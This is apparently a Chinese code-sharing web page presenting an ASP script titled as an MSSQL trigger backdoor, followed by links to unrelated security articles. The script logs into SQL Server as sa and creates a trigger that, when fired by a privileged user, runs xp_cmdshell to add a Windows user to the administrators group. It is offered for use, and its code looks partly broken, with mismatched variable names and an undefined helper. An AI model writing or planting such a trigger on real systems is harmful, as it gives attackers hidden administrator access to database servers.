MsSql 觸發(fā)器后門(mén)asp版

發(fā)布時(shí)間：2009-09-03 20:18:53 作者：佚名

我要評(píng)論

根據(jù)雪山劍神的一篇文章寫(xiě)的 asp代碼。他的文章在黑手7、8月合刊。

復(fù)制代碼

代碼如下:

<%
'里邊的變量代碼大家用時(shí)自己改吧
On Error Resume next
Set conn=Server.CreateObject("ADODB.Connection")
DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"
conn.Open DSN
if conn.State=1 then
response.write("成功")
sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13) '建立myasp_bkdoor觸發(fā)器，觸發(fā)baby庫(kù)中的users_member表的update操作加用戶
SQL1="update users_member set email=3 where accountid=1" '觸發(fā)
'sql2="drop TRIGGER myasp_bkdoor"
set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) '觸發(fā)
Do Until Rs.EOF
Response.Write " <tr>" & vbNewLine
For I = 0 To Rs.Fields.Count - 1
Response.Write "<td>" & SQLOut(oRs(I)) & "</td>" & vbNewLine
Next
Response.Write " </tr>" & vbNewLine
Rs.MoveNext
Loop
else
response.write("失敗")
end if
%>

Tag：mssql 觸發(fā)器后門(mén)

相關(guān)文章

封UDP的服務(wù)器真的打不了么？封UDP、封海外服務(wù)器
很多游戲服務(wù)器租用的時(shí)候會(huì)出現(xiàn)一些封UDP的字眼，網(wǎng)上一些文章也說(shuō)UDP協(xié)議不可靠！為什么要封UDP呢？既然不可靠，為什么有些人還要使用它呢？今天與你們分享一下UDP，希望
2024-05-07
魔獸世界服務(wù)器被DDoS攻擊怎么辦？DDoS攻擊防御方法
魔獸世界服務(wù)器被攻擊在目前來(lái)說(shuō)也是比較常見(jiàn)的，同行競(jìng)爭(zhēng)激烈，在官服開(kāi)放時(shí)也遇到過(guò)DDOS攻擊，要是飛飛沒(méi)記錯(cuò)是在22年9月14日，從剛開(kāi)始的身份驗(yàn)證服務(wù)器出現(xiàn)問(wèn)題，到確
2023-07-17
分享五大免費(fèi)企業(yè)網(wǎng)絡(luò)入侵檢測(cè)（IDS）工具
這篇文章主要分享一下五大免費(fèi)企業(yè)網(wǎng)絡(luò)入侵檢測(cè)（IDS）工具，當(dāng)前企業(yè)對(duì)于網(wǎng)絡(luò)安全越來(lái)越重視，那么后期可能就需要大家多多關(guān)注一些安全工具的使用于檢測(cè)
2019-12-01
網(wǎng)絡(luò)安全基礎(chǔ)之網(wǎng)絡(luò)協(xié)議與安全威脅的關(guān)系介紹
網(wǎng)絡(luò)協(xié)議是什么呢？網(wǎng)絡(luò)協(xié)議是網(wǎng)絡(luò)中計(jì)算機(jī)或設(shè)備之間進(jìn)行通信的一系列規(guī)則集合。本文中小編介紹的是網(wǎng)絡(luò)協(xié)議和安全威脅的關(guān)系，需要的朋友不妨閱讀本文了解一下
2019-04-02
DDoS攻擊原理是什么?DDoS攻擊原理及防護(hù)措施介紹
DDoS攻擊是由DoS攻擊轉(zhuǎn)化的，這項(xiàng)攻擊的原理以及表現(xiàn)形式是怎樣的呢？要如何的進(jìn)行防御呢？本文中將會(huì)有詳細(xì)的介紹，需要的朋友不妨閱讀本文進(jìn)行參考
2019-01-15
基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備介紹
本文中介紹的是基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備，感興趣的朋友不妨閱讀本文進(jìn)行了解
2019-01-11
為何黑客要挾制路由器DNS 用戶該怎樣實(shí)時(shí)發(fā)覺(jué)和防備方法
起首說(shuō)說(shuō)挾制路由器是什么意思，路由器挾制平日指的是，開(kāi)啟了無(wú)線網(wǎng)絡(luò)功效的無(wú)線路由器，攻擊者經(jīng)由過(guò)程破解無(wú)線暗碼銜接上無(wú)線網(wǎng)后，再登錄路由治理界面來(lái)節(jié)制全部無(wú)線網(wǎng)
2018-05-16
大勢(shì)至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)
這篇文章主要介紹了大勢(shì)至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)置方法詳解，，小編覺(jué)得還是挺不錯(cuò)的，具有一定借鑒價(jià)值，下面就來(lái)和小編一起看看
2018-01-25
詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密
這篇文章主要介紹了詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密，如何保護(hù)sd卡文件的安全，如何給SD卡設(shè)置密碼、如何給SD卡加密，下面就跟小編一起來(lái)看看吧
2018-01-19
server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法
這篇文章主要介紹了server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法詳細(xì)介紹，保護(hù)服務(wù)器共享文件設(shè)置訪問(wèn)權(quán)限，讓每個(gè)部門(mén)只訪問(wèn)自己的共享文件等，
2018-01-19